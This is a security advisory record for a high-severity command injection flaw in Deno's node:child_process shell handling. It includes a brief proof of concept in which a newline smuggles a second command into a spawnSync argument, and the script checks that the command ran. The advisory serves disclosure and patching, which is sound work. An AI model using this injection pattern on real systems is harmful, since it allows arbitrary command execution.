GHSA-hmh4-3xvx-q5hr
Suggest an improvement- Source
- https://github.com/advisories/GHSA-hmh4-3xvx-q5hr
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-hmh4-3xvx-q5hr
- Aliases
- Published
- 2026-02-19T20:31:41Z
- Modified
- 2026-02-20T22:35:02.431472Z
- Severity
-
- 8.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process
- Details
-
Summary
A command injection vulnerability exists in Deno's
node:child_processimplementation.Reproduction
import { spawnSync } from "node:child_process"; import * as fs from "node:fs"; // Cleanup try { fs.unlinkSync('/tmp/rce_proof'); } catch {} // Create legitimate script fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");'); // Malicious input with newline injection const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`; // Vulnerable pattern spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], { shell: true, encoding: 'utf-8' }); // Verify console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));Run:
deno run --allow-all poc.mjsThe file
/tmp/rce_proofis created, confirming arbitrary command execution.Mitigation
All users need to update to the patched version (Deno v2.6.8).
- Database specific
{ "nvd_published_at": "2026-02-20T21:19:28Z", "github_reviewed_at": "2026-02-19T20:31:41Z", "github_reviewed": true, "severity": "HIGH", "cwe_ids": [ "CWE-78" ] }- References
Affected packages
crates.io / deno
Package
- Name
- deno
- View open source insights on deps.dev
- Purl
- pkg:cargo/deno